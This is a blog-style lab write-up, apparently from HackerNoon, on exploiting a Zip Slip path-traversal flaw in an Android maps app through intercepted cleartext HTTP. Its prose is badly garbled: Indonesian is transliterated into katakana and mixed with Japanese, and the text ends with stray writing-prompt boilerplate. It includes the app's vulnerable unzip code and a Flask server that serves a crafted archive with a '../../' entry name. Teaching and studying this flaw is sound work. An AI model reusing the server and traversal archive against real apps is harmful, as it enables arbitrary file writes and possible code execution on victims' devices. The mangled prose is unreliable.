Zip Slip は、アーカイブ抽出プロセスに広く見られる深刻な脆弱性で、攻撃者がシステムに任意のファイルを書き込むことを可能にします。通常、これはRCE (リモート コード実行)につながります。この脆弱性は、2018 年 6 月 5 日に公開される前に、Snyk セキュリティ チームによって発見され、責任を持って開示されました。この問題は、HP、Amazon、Apache、Pivotal などの大手企業が所有するプロジェクトを含む、数千のプロジェクトに影響を及ぼします。
Zip Slip は、ディレクトリ トラバーサルを含むファイル名(eg, ../../evil.sh)
を持つ特別に細工されたアーカイブを通じて悪用されます。この脆弱性は、tar、ghz、jar、war、cpio、apk、rar、7z など、多くのアーカイブ形式で発生する可能性があります。
この脆弱性の核心はディレクトリ トラバーサルであり、攻撃者はターゲット フォルダ外のシステム ファイルの一部にアクセスできます。その後、攻撃者は実行可能ファイルを上書きしてリモートで実行したり、システムまたはユーザーがファイルを呼び出すのを待って被害者のマシンでコマンドを実行したりできます。さらに、この脆弱性は、構成ファイルやその他の機密リソースを上書きすることで損害を引き起こす可能性があり、ユーザーのマシンとサーバーの両方で悪用される可能性があります。
ZIP スリップの脆弱性を悪用するには、Android のアプリケーションが必要です。
Google マップを使用して、地元の北ハルス州の地図をダウンロードし、ボタン+レイヤーをクリックしてリソースをダウンロードしてください。
Tetapi Sebelum KITA 分析フロー ダリ キャラ ケルジャ APK INI KITA HARUS MEMAAI APK Burpsuite。モバイル向けのウェブ アプリを使用して、アプリをダウンロードしてアプリをダウンロードできます。問題は、メンデテクシ ケレンタナン、メンガナリシス、ダン メンガタシ マサラ ケアマナンです。
Anda bisa mendownload ツール nya dengan クリック リンク dibawah ini:
https://portswigger.net/burp/communitydownload
ベリクト アダラ ハシル インターセプト ケティカ キタ マウ メナンバーカン マップ ニャ、ダン ビサ ディ分析 カラウ APK 初期レンタン カレナ パーミンターン API ニャ マシ メマカイ プロトコル HTTP ティダク メングナカン HTTPS ヤン ディマナ メムンキンカン 攻撃者 ティダク ハンヤ ビサ メリハット トラフィック ヤン ディ キリム ダン ディテリマ、テタピ ジュガ ビサ操作/メモディフィカシ要求と応答ニャセカラクリアテキスト。
ダン ファクタ ニャー バーワ ケティカ マシ メマカイ HTTP ダパット メンブカ セルルー エリア ペルムカーン セランガン、コントーニャ ジェニス セランガン ヤン セダン キタ ブアト イニ。
Bisa dilihat juga menggunakanツール JADX untuk melakukan リバース エンジニアリング ヤン ディマナ キタ bisa melakukan 静的分析パッド セブア アプリカシ メムンキンカン ペニエラン ウントゥク メマハミ ストラクトゥル ダン ロジック アプリカシ。
ファイルnetwork_security_config.xml
を分析して設定を保存し、 cleartextTrafficPermitted="true"
を設定します。 Sehingga は、ドメイン ヤン ディジンカンのクリア テキスト トラフィックを設定します。 Tetapi apakah ドメイン ini benar-benar digunakan untuk CleartextTraffic tersebut。ハンヤ・ウントゥク・ペングジアン/ティダク・ディグナカン・ダラムの生産を支援します。
ini adalah Hasil intercept ketika kita mendownload マップ Nya yang dimana dia mengambil ファイル ZIP dengan 形式 .ghz
Dan mencoba mendownload ファイル .ghz secara マニュアル dengan copas di ラップトップ。 Berikut adalah isi ファイル ZIP tersebut。
Untuk mengetahui lokasi data yang di unzip oleh aplikasi kit bisa gunakan コマンドfind / | grep australia oceania_nauru.map
で ADB シェル モバイル エミュレータを実行し、パスティカン ジュガ カラウ 北スーダ メミリキ アクセス ルート エミュレータを実行します。
Bisa dilihat kalau パス ファイル yang di unzip ada di :
/data/media/0/Android/data/io.hextree.pocketmaps/files/Download/pocketmaps/maps/
ファイル マップを解凍して、ベナール ベナールを解凍してください。
任意のファイル書き込みの脆弱性、セペルティ ヤン スダ、北ケタホイの問題、ファイル ZIP マップの処理。 Lakukan lagi 静的解析 dengan mencari キーワード: ZipEntry
agar mengetahui class kode nya meng-handle file ZIP mapnya.
セベラム・キタ分析リービ・ダラム・コード・ニャ、サヤ・アカン・メンギクティ・パンドゥアン・ダリ・スニック・チーム・ウントゥク・メンカリ・コード・ヤン・セリング・ディインプリメンタシ・テタピ・レンタン。ベリクト・アダラ・サラ・サトゥ・パンドゥアン・ヤン・フサス・ウントゥク・バハサ・ジャワ、ビザ・バカ・レビ・ランジュット: https://github.com/snyk/zip- Slip-vulnerability
ペンジェラサン:
コード ベリクト レンタン テルハダプ セランガン ジップ スリップ カレナ ティダク メラクカン バリダシ ヤン メマダイ テルハダプ ジャルール ファイル ダラム アーシップ ジップ セベルム メンゲクストラクニャ。 Di sini、 e.getName()
dapat mengembalikan nama file dengan jalur relatif yang berbahaya、seperti ../../malicious.sh
。 Ini berarti file tersebut bisa diekstrak di luar destinationDir
yang ditentukan.
InputStream input = zip.getInputStream(e); IOUtils.copy(input, write(f));
セテラ ファイル ディブアト、コンテン ファイル ラングスン ディサリン タンパ メリクサ ジャルール ケルアラン アパカ スダ アマン アタウ ティダク。ジカ・ジャルール・ターセブット・メニュージュ・ケ・ロカシ・ベルバハヤ、セペルティ・ディレクトリ・ルート・システム・アタウ・フォルダ、レイン・ヤン・セハルスニャ・ティダク・ダパット・ディアクセス・オレ・アプリカシ、それはビサ・サンガット・ベルバハヤです。
カレナ キタ スーダ メンゲタホイ コード ヤン レンタン セスアイ パンドゥアン マリ キタ分析コード APK ニャ:
ペンブアタン パス タンパ バリダシ:
String str3 = file.getAbsolutePath() + File.separator + nextEntry.getName();
ディシニ、ジャルール ファイル ( str3
) ディブアット デンガン メンガブンカン パス ダリ ディレクトリ トゥジュアン ( file.getAbsolutePath()
) デンガン ナマ エントリ zip ( nextEntry.getName()
)。ナムン、 nextEntry.getName()
セペルティ../../
、ヤン ダパット メンエバブカン ファイル ディクストラク ディ ルアー ディレクトリ ヤン ディマクスッドfile
)。
Setelah パスを指定し、ファイルをディレクトリから指定します。
if (nextEntry.isDirectory()) { new File(str3).mkdir(); } else { e(zipInputStream, str3, eVar, "" + i3 + " Unzipping " + str2, size, null); }
メニュー ファイル タンパ メマスティカン バフワstr3
アダラ ジャルール ヤン アマンを参照してください。
2 番目の環境を維持する必要があります。
動的 HTTP モッキング環境のセットアップ: 拡張 HTTP モック バープスイートの初期設定、メングバー応答、アズリ アプリカシンヤ、デンガン、メンココッカン ルール、ヤン スーダ、キタ キリムカンhttp history
、 input manual
。パダコントーディバワイニサヤメルバ応答ニャデンガンメミリ URL にリダイレクト、セヒンガ設定応答アプリカシセカラリアルタイムアカンメンガンビル応答ダリ HTTP モック。
2.ローカル サーバー環境のセットアップ: Karena setiap request dari aturan yang kitakokkan redirect ke悪意のあるローカル サーバーjadi kita buat untuk悪意のある zip nya:
from flask import Flask, jsonify, send_file import zipfile, io app = Flask(__name__) @app.route('/map.json') def map_json(): response = { "maps-0.13.0_0-path": "maps", "maps-0.13.0_0": [ {"name": "maliciousmaps_USA", "size": "300k", "time": "2025-01"}, ] } return jsonify(response) @app.route('/map.ghz') def map_archive(): # Create a ZipFile object zip_buffer = io.BytesIO() filename = "../../downloads/hax" with zipfile.ZipFile(zip_buffer, 'w', zipfile.ZIP_DEFLATED) as zip_file: content = "You have been hacked" zip_file.writestr(filename, content) zip_buffer.seek(0) return send_file( zip_buffer, mimetype='application/zip', as_attachment=True, download_name='map.ghz' ) if __name__ == '__main__': app.run(debug=True, port=1234)
なぜあなたはデジタルセキュリティの権威なのですか?
サイバー犯罪は絶えず進化しています。デジタル詐欺師との戦いにおいて、HackerNoon コミュニティが知ることができるサイバー犯罪の世界での新しいことは何でしょうか?
トロイの木馬、マルウェア、スパイウェアなど。私たちの大切な PC に感染し、情報を盗む可能性のある最新のバグについて、詳しく教えてください。それだけではありません。他にどんなサイバーの悪意があるのか教えてください。
脆弱性のある新しいテクノロジーをどのように扱っていますか? スマートホーム、AI、モノのインターネットには脆弱性があります。
下書きを書いて提出する前に、上記の情報をすべて削除してください。 よろしくお願いします!